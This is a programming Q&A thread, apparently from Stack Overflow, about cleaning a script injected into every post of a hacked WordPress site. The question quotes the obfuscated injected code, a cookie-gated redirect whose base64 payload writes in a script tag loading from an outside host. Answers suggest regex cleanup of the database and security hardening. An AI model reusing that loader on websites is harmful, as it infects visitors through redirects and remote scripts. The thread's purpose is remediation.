# How to Remove script code injecteded in all my wordpress post

Tags: javascript, wordpress

how to Remove script code injected in all my wordpress post below is the script

> (e){var U=// Single line comment(// (“(?:^|;
>   )”+e.replace(/([.$?|{}()[]\/+^])/g,”\$1″)+”=([^;])”));return
>   U?decodeURIComponent(U[1]):void 0}var
>   src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void
>   0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new
>   Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/;
>   expire(e){var U=// Single line comment(// (“(?:^|;
>   )”+e.replace(/([.$?|{}()[]/+^])/g,”$1″)+”=([^;])”));return
>   U?decodeURIComponent(U[1]):void 0}var
>   src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void
>   0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new
>   Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/;
>   expires=”+date.toGMTString(),tv(‘=”+date.toGMTString(),tv(‘

full script here http://share-ask.com/who-will-rule-robots-or-humans/.

Comment: Please format your code as code, and include relevant content within the question, not as a link to an external site.

Comment: improve formatting

Answer (score 0):

I suggest you to remove the_content() function and add get_the_content() instead.

find the_content() and replace it with following.

```
echo esc_attr(get_the_content());
```

This actually remove unnecessary scripts and tags.

Comment: where is the_content() l;ocated

Comment: search using notepad++ or any other editor in theme files, are you using custom theme or premium theme?

Answer (score 0):

One way is to download the sql-database, make a copy, edit in Notepad++ and make a fancy regex or similar to select all the affected lines, then remove them.
Drop your old database and reimport the sql database you changed...

Only attempt this if you are comfortable with working with the database separate from your webpage.

If something like this has been injected on your website, make sure you do security updates in the future. Make sure all your admin-users have hard to guess passwords, consider changing the ones you have, and double check that there are no new admins registered that you dont know who are (that happened to me once).

Comment: you mean each post table Ill have to manually remove the script

Comment: No, you want to make a regex or similar that will identify this code for you. You need to figure out what is similar between every instance, and if there is similar code you might delete by accident after making the regex. Testing is key.

     \\(e\\).*?date.toGMTString\\(\\)\,tv
For example, will delete everything from (e) to date.toGMTString(),tv - if you use Replace with nothing in Notepad++. The forward slashes are escape-characters. the .*? represent the space inbetween these. Look up regex on the net. https://superuser.com/questions/554387/find-and-replace-text-between-and-in-notepad

Answer (score 0):

Looks to me like your site has been hacked. Rather than try to find ways around it, it would be better to remove the infection.

Take a deep breath and read this: https://codex.wordpress.org/FAQ_My_site_was_hacked